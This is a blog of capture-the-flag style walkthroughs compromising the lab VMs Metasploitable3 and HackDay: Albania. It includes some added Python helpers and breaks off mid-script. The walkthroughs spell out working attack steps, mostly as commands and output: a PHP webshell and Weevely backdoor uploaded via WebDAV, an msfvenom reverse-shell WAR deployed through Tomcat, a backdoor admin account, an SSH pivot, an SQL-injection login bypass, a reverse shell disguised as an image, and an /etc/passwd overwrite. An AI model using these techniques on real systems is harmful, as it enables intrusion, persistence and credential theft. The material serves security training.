Host is up (0.00038s latency).
Not shown: 65518 filtered ports
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
22/tcp    open  ssh               OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
1617/tcp  open  unknown
3000/tcp  open  http              WEBrick httpd 1.3.1 (Ruby 2.3.1 (2016-04-26))
4848/tcp  open  ssl/appserv-http?
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8022/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8080/tcp  open  http-proxy        GlassFish Server Open Source Edition  4.0 
8282/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8484/tcp  open  http              Jetty winstone-2.8
8585/tcp  open  http              Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp  open  wap-wsp?
49153/tcp open  msrpc             Microsoft Windows RPC
49154/tcp open  msrpc             Microsoft Windows RPC
49231/tcp open  unknown
49235/tcp open  unknown

Port 8585 caught my eye: the Apache banner advertises PHP and DAV/2, so this could be a WAMP installation with WebDAV enabled.

I browsed to the URL and saw an uploads directory right away, this looked promising.

There is nothing in our uploads directory…yet…

Using Cadaver, a command-line WebDAV client, I was able to upload the following simple PHP webshell without any authentication. This webshell lets you run one-off commands and is pretty cumbersome/tedious to work with, but it's a start!

root@mrb3n:~/Desktop/metasploitable3# cat shell.php
<?php echo shell_exec($_GET['e']); ?>

Our upload succeeded

root@mrb3n:~/Desktop/metasploitable3# cadaver http://192.168.253.143:8585/uploads/
dav:/uploads/> put shell.php
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 38 bytes succeeded.
dav:/uploads/> 


A quick test to confirm command execution:

root@mrb3n:~/Desktop/metasploitable3# curl http://192.168.253.143:8585/uploads/shell.php?e=ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 4:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::ad02:4595:821a:bb65%16
   IPv4 Address. . . . . . . . . . . : 192.168.253.143
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::69d3:300:90dd:c46%15
   IPv4 Address. . . . . . . . . . . : 192.168.110.140
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.110.2

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected

   Connection-specific DNS Suffix  . : localdomain

I decided to use Weevely to generate a semi-interactive web shell and uploaded it to the target.

root@mrb3n:~/Desktop/metasploitable3# weevely generate pass123 /root/Desktop/metasploitable3/weevely.php
Generated backdoor with password 'pass123' in '/root/Desktop/metasploitable3/weevely.php' of 1446 byte size.
root@mrb3n:~/Desktop/metasploitable3# weevely http://192.168.253.143:8585/uploads/weevely.php pass123

[+] weevely 3.2.0

[+] Target:	192.168.253.143:8585
[+] Session:	/root/.weevely/sessions/192.168.253.143/weevely_0.session

[+] Browse the filesystem or execute commands starts the connection

[+] to the target. Type :help for more information.

A netstat showed many more listening ports than nmap had found from the outside. They are bound to 0.0.0.0, so the host firewall must be filtering them on the interface I scanned; the ipconfig output earlier showed a second NIC on 192.168.110.0/24, which is where they would be reachable.

metasploitable3:C:\wamp\www\uploads $ netstat -ant

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:1617           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3700           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:4848           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:7676           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8019           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8022           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8028           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8031           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8032           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8181           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8282           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8444           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8484           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8585           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8686           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:9200           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:9300           0.0.0.0:0              LISTENING       InHost

I had a look around at what other services were installed. Digging into the 'Apache Software Foundation' directory I found a Tomcat install along with the tomcat-users.xml file, which holds cleartext credentials for the Tomcat manager.

metasploitable3:C:\wamp\www\uploads $ cd "C:\Program Files"
metasploitable3:C:\Program Files $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is AC30-8D23

 Directory of C:\Program Files

12/02/2016  09:26 PM    <DIR>          .
12/02/2016  09:26 PM    <DIR>          ..
12/02/2016  08:47 PM    <DIR>          7-Zip
12/02/2016  08:55 PM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
12/02/2016  09:26 PM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
12/02/2016  08:55 PM    <DIR>          Java
12/02/2016  08:58 PM    <DIR>          jenkins
12/02/2016  09:02 PM    <DIR>          jmx
11/26/2016  12:54 AM    <DIR>          OpenSSH
11/26/2016  12:54 AM    <DIR>          Oracle
12/02/2016  09:11 PM    <DIR>          Rails_Server
12/02/2016  08:48 PM    <DIR>          Reference Assemblies
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
12/02/2016  09:01 PM    <DIR>          wordpress
metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ type tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
…………………………SNIP………………………………….
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
</tomcat-users>

The server.xml file tells us that Tomcat is running on port 8282:

metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

..........................snip...............................................

    <!-- A "Connector" represents an endpoint by which requests are received
         and responses are returned. Documentation at :
         Java HTTP Connector: /docs/config/http.html (blocking & non-blocking)
         Java AJP  Connector: /docs/config/ajp.html
         APR (HTTP/AJP) Connector: /docs/apr.html
         Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8282" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool--

Logging in to the Tomcat manager with the credentials sploit:sploit I am able to deploy a malicious WAR file to obtain a reverse shell.

I created a WAR backdoor using msfvenom and unpacked it to get the name of the .jsp file inside, since that is the path I will need to request.

root@mrb3n:~/Desktop/metasploitable3# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=8443 -f war > shell.war

root@mrb3n:~/Desktop/metasploitable3# unzip shell.war 
Archive:  shell.war
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: WEB-INF/
  inflating: WEB-INF/web.xml         
  inflating: fmzbtohe.jsp            
  inflating: OONNFiRvYlVcbIh.txt
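
As an added example (not msfvenom's code or the page's), the following Python builds a WAR with the same layout unzip showed above, a manifest, a WEB-INF/web.xml and one JSP at the root, and derives the URL that triggers it. The JSP here is a constructed, benign probe that prints the account Tomcat runs as rather than a reverse shell; build_war(), jsp_entries() and trigger_urls() are my names.

```python
import io
import zipfile

# A minimal deployment descriptor. Tomcat 8 deploys a WAR without one, but
# msfvenom includes one, so this constructed packer does too.
WEB_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">\n'
    '</web-app>\n'
)

# Constructed, benign probe page: proves code execution by printing the account
# and OS the servlet container runs under, which is the fact the whoami above gave.
PROBE_JSP = '<%= System.getProperty("user.name") %> on <%= System.getProperty("os.name") %>\n'


def build_war(jsp_name: str, jsp_source: str = PROBE_JSP) -> bytes:
    """Pack one JSP at the root of a WAR. Tomcat serves it at /<context>/<jsp_name>,
    where <context> is the WAR's base name (shell.war -> /shell/)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def jsp_entries(war_bytes: bytes) -> list:
    """The JSPs at the WAR root: the names you must request explicitly, since
    browsing the context directory alone returns nothing (no welcome file)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(n for n in war.namelist()
                      if n.lower().endswith(".jsp") and "/" not in n)


def trigger_urls(base_url: str, war_filename: str, war_bytes: bytes) -> list:
    """URLs that execute each root JSP once the WAR is deployed under its own name."""
    context = war_filename[:-4] if war_filename.lower().endswith(".war") else war_filename
    return ["%s/%s/%s" % (base_url.rstrip("/"), context, n) for n in jsp_entries(war_bytes)]
```

One caveat on deployment: the sploit account only has manager-gui, which is the HTML form. The text interface at /manager/text/deploy that tools script against needs the manager-script role, so with these credentials the WAR has to go through the form upload.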

I deployed the WAR file and confirmed it was successful.

Browsing directly to the /shell/ context does not yield anything; we still need to request the exact .jsp file.

I next set up a netcat listener and browsed to: http://192.168.253.143:8282/shell/fmzbtohe.jsp

root@mrb3n:~/Desktop/metasploitable3# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.130] from (UNKNOWN) [192.168.253.143] 51065
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

I got a hit on my listener and, hey, a SYSTEM shell. The Tomcat service is running as LocalSystem, so no separate privilege escalation was needed.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system

I added an administrative user next to set up some persistence.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net user benr pass123 /add
net user benr pass123 /add
The command completed successfully.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators benr /add
net localgroup administrators benr /add
The command completed successfully.

To get at the other services we need a route to the 192.168.110.0/24 subnet. I set up a SOCKS proxy with SSH dynamic port forwarding (-D) through the target's OpenSSH service, using my new administrative user.

root@mrb3n:~/Desktop/metasploitable3# ssh -l benr -D 1080 192.168.253.143 -N -f
benr@192.168.253.143's password:

I edited /etc/proxychains.conf to point at the SOCKS proxy on 127.0.0.1:1080, and now I could access all services such as terminal services. Note the -sT and -P0 flags: only full TCP connects can be tunnelled through a SOCKS proxy, so SYN scans and ICMP/ARP host discovery will not work here.

root@mrb3n:~/Desktop/metasploitable3# proxychains nmap -P0 -sT -p 3389 --open -oN tcp.nmap 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-04 12:26 EST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Nmap scan report for 192.168.110.140
Host is up (0.0091s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

I confirmed that I could reach the RDP service through the tunnel (the CredSSP errors are rdesktop failing NLA and falling back to a plain TLS connection):

root@mrb3n:~# proxychains rdesktop 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)
Autoselected keyboard map en-us
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
ERROR: SSL_read: 5 (Success)
Disconnected due to network error, retrying to reconnect for 70 minutes.
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.

This was just one quick and easy way to local access and ultimately a SYSTEM shell. I will add to this post in the future to highlight other paths without the use of Metasploit. I will also do a separate post on the many ways of using Metasploit, because it is a great tool and a good way to start and gain confidence, but it should not replace honing your manual exploitation skill set.

HackDay: Albania vulnhub walkthrough

Another new VM dropped over at vulnhub. You can grab it here: https://www.vulnhub.com/entry/hackday-albania,167/

The readme comes with the following note: "VMware users may have issues with the network interface going down by default. We recommend (for once!) using Virtualbox."

Well, with a few steps we can get this working on VMware. The underlying problem is that Ubuntu 16.04 uses predictable interface names, so the name baked into /etc/network/interfaces does not match what VMware's virtual NIC is called; forcing the old eth0 naming makes the configuration apply regardless of hypervisor.

I first attached a CD-ROM to the VM with a GParted ISO, selected boot to firmware and changed the boot order in the BIOS to boot from the ISO. Once GParted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

1) sudo su
2) mount /dev/sda1 /mnt
3) vim /mnt/etc/network/interfaces and change the interface name to 'eth0'
4) vim /mnt/etc/default/grub and edit the line
   GRUB_CMDLINE_LINUX="" to read:
   GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
5) poweroff
6) Swap the GParted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and, once the installer menu loads, choose "Rescue a broken system" to boot into rescue mode.
7) Follow all the prompts until arriving at the screen that allows you to execute a shell in /dev/sda1.
8) In this shell type "update-grub", then type "exit".
9) Select "Execute a shell in the installer environment", then "poweroff".
10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

h/t to knightmare for pointing me towards this article:

http://www.itzgeek.com/how-tos/mini-howtos/change-default-network-name-ens33-to-old-eth0-on-ubuntu-16-04.html

Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.

root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-11-19 19:45 EST
SYN Stealth Scan Timing: About 12.53% done; ETC: 20:00 (0:13:02 remaining)
Nmap scan report for 192.168.253.136
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8008/tcp open  http
MAC Address: 00:0C:29:86:05:34 (VMware)

Well, the whole web app is in Albanian so this will be an extra challenge.

root@mrb3n:~# curl -s http://192.168.253.136:8008/
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>HackDay Albania 2016</title>
	<link rel="stylesheet" href="js/jquery-ui.css">
	<script src="js/jquery-3.1.1.min.js"></script>
	<script src="js/jquery-ui.js"></script>
	<style type="text/css">
		body {
			background-image: url("bg.png");
			background-repeat: no-repeat;
			background-size: cover;
		}
		.ui-draggable .ui-dialog-titlebar{
			background-color: #f05b43;
		}
		.ui-dialog .ui-dialog-title{
			color: white;
		}

	</style>
	<script>
		$(document).ready(function(){
			$("#dialog").dialog();
		});
	</script>
</head>
<body>
	<div id="dialog" title="Miresevini">
  <p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p>
</div>

<!--OK ok, por jo ketu :)-->
</body>

A few very rough translations thanks to Google Translate:

Miresevini = Welcome

Ne qofte se jam UNE, e di se ku te shkoj ;) = If it is ME, I know where to go ;)

OK ok, por jo ketu :) = OK ok, but not here :)

I fired Dirb against it and got a robots.txt file and not much else.

root@mrb3n:~# dirb http://192.168.253.136:8008/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 19 22:25:48 2016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.253.136:8008/ ----
+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750)                   
==> DIRECTORY: http://192.168.253.136:8008/js/                                 
+ http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702)                   
+ http://192.168.253.136:8008/server-status (CODE:403|SIZE:305)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/ ----
==> DIRECTORY: http://192.168.253.136:8008/js/external/                        
==> DIRECTORY: http://192.168.253.136:8008/js/images/                          
+ http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Nov 19 22:25:51 2016
DOWNLOADED: 9224 - FOUND: 4
root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

OK, that's a bunch to browse to by hand. I checked out one, and I can only assume most of them are like this:

Google translate tells me this roughly translates to: “Is this the proper directory, or are you a jerk?”

OK, so I’m thinking my next step is to figure out a valid directory. First cut out just the directory names from the robots.txt file:

root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt | cut -f2 -d "/" > robots.txt
root@mrb3n:~# cat robots.txt 
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
unisxcudkqjydw
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
qjeotyqzgmfuzs

Prepend the URL to each with awk

root@mrb3n:~# awk '{print "http://192.168.253.136:8008/" $0;}' robots.txt > dir.txt
root@mrb3n:~# cat dir.txt 
http://192.168.253.136:8008/rkfpuzrahngvat
http://192.168.253.136:8008/slgqvasbiohwbu
http://192.168.253.136:8008/tmhrwbtcjpixcv
http://192.168.253.136:8008/vojtydvelrkzex
http://192.168.253.136:8008/wpkuzewfmslafy
http://192.168.253.136:8008/xqlvafxgntmbgz
http://192.168.253.136:8008/yrmwbgyhouncha
http://192.168.253.136:8008/zsnxchzipvodib
http://192.168.253.136:8008/atoydiajqwpejc
http://192.168.253.136:8008/bupzejbkrxqfkd
http://192.168.253.136:8008/cvqafkclsyrgle
http://192.168.253.136:8008/unisxcudkqjydw
http://192.168.253.136:8008/dwrbgldmtzshmf
http://192.168.253.136:8008/exschmenuating
http://192.168.253.136:8008/fytdinfovbujoh
http://192.168.253.136:8008/gzuejogpwcvkpi
http://192.168.253.136:8008/havfkphqxdwlqj
http://192.168.253.136:8008/ibwglqiryexmrk
http://192.168.253.136:8008/jcxhmrjszfynsl
http://192.168.253.136:8008/kdyinsktagzotm
http://192.168.253.136:8008/lezjotlubhapun
http://192.168.253.136:8008/mfakpumvcibqvo
http://192.168.253.136:8008/ngblqvnwdjcrwp
http://192.168.253.136:8008/ohcmrwoxekdsxq
http://192.168.253.136:8008/pidnsxpyfletyr
http://192.168.253.136:8008/qjeotyqzgmfuzs

Open each one quickly in the web browser:

root@mrb3n:~# iceweasel $(cat dir.txt)

All but one give the same error message; the odd one out is /unisxcudkqjydw.

Checking it out gives us a hint to another directory:

root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/ in there ???
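
Opening 26 tabs works, but the same idea scales better as a diff of response bodies. The added Python below (mine, not the author's or the VM's) parses the Disallow entries, fetches each one and reports the URLs whose body differs from the most common one; find_outliers() is pure, so it is exercised here on constructed bodies that stand in for the Albanian decoy text and the real directory. parse_disallow(), fetch(), find_outliers() and probe() are my names.

```python
import hashlib
from collections import Counter
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen


def parse_disallow(robots_txt: str) -> list:
    """Return the Disallow paths from a robots.txt in file order, ignoring comments
    and empty rules (a bare 'Disallow:' allows everything and is not a candidate)."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def fetch(url: str, timeout: float = 5.0) -> bytes:
    """GET the URL and return the body, including the body of 4xx/5xx responses:
    a decoy directory and a real one may differ only in their content."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0 (robots-probe)"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read()
    except HTTPError as err:
        return err.read()
    except URLError:
        return b""


def find_outliers(bodies: dict) -> list:
    """Given {url: body}, return the URLs whose body differs from the most common one.
    With 25 identical decoys and one real directory, the real one is the only outlier."""
    digests = {url: hashlib.sha256(body).hexdigest() for url, body in bodies.items()}
    if not digests:
        return []
    common, _ = Counter(digests.values()).most_common(1)[0]
    return [url for url, digest in digests.items() if digest != common]


def probe(base_url: str, robots_txt: str) -> list:
    """End to end: every Disallow entry fetched and compared. Needs network access."""
    base = base_url.rstrip("/")
    bodies = {base + path: fetch(base + path) for path in parse_disallow(robots_txt)}
    return find_outliers(bodies)
```

Hashing whole bodies assumes the decoy page is byte-identical each time; if a site embeds the requested path or a timestamp in its error page, normalize those out before hashing or compare sizes and status codes instead.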

Vulnbank is where we want to be:

root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /unisxcudkqjydw/vulnbank</title>
 </head>
 <body>
<h1>Index of /unisxcudkqjydw/vulnbank</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>

I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.

I threw a single quote into the username field and got the following error message:

I was feeling lazy so I threw it into sqlmap, but something was being filtered on the back end. I couldn't get sqlmap to work with or without tamper scripts, aside from confirming the SQLi, so I turned to Burp.

root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=*&password=test' --dbms=mysql --risk=3 --level=5 --dbs

………………snip…………………..

[22:48:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[22:48:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[22:49:03] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable 

Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.

Perhaps we can bypass the login?

Statements such as ' OR 'a'='a' would not work because of the keyword filtering, and special characters appeared to be filtered as well. After many, many fuzzing attempts I was finally able to log in directly with the following string: '%20#;--%20- which is the following without the URL encoding:

' #;-- -

Basically, the single quote closes the username literal and the # comments out the rest of the query, so the password check never runs and I am logged in directly as the first user in the database. The application executes a query such as this:

"SELECT * FROM users WHERE username='$username' AND password='$password'"

but it is terminated after the username check, with the remainder of the query commented out. All you actually need is '%20#, as everything after the # is superfluous.

I tried to upload a .php file but received the following error:

OK, lets try with a jpg file. I grabbed a php reverse shell and renamed it with a jpg extension and the system seemed to like it:

The page source gave me the location of the file:

I started a netcat listener and browsed to the file located at:

http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=albania.jpg

I got a hit right away and used Python 3 to grab a proper tty (Python 2 was missing from the system):

root@mrb3n:/var/www/html# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.134] from (UNKNOWN) [192.168.253.136] 37742
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 23:19:42 up 16 min,  0 users,  load average: 0.00, 0.01, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackday:/$

Ok, we’re in. Taking a look around the system I see one user ‘taviso’ with an empty home directory:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…………………..snip………………………………………
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

All of the files in /var/www/html are owned by this user and the account is in the sudo group so it must be significant:

www-data@hackday:/tmp$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

I found the MySQL DB root password in the config.php file but that did not work, nor did any of the passwords in the database. I fired off SSH brute-forcing with Hydra against the ‘taviso’ user and went about my enumeration.

A search for world-writable files showed that /etc/passwd was writable.

www-data@hackday:/tmp$ find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
< / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null                   
/etc/passwd
.........snip.........

Well, I should be able to edit this file and either set a new root password, add a user or change this user’s password. Let’s change taviso’s password.

I first use Python to generate a password hash:

root@mrb3n:/var/www/html# python -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'
$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1

I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:

root@mrb3n:/var/www/html# cat passwd.sh 
cat << "EOF"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
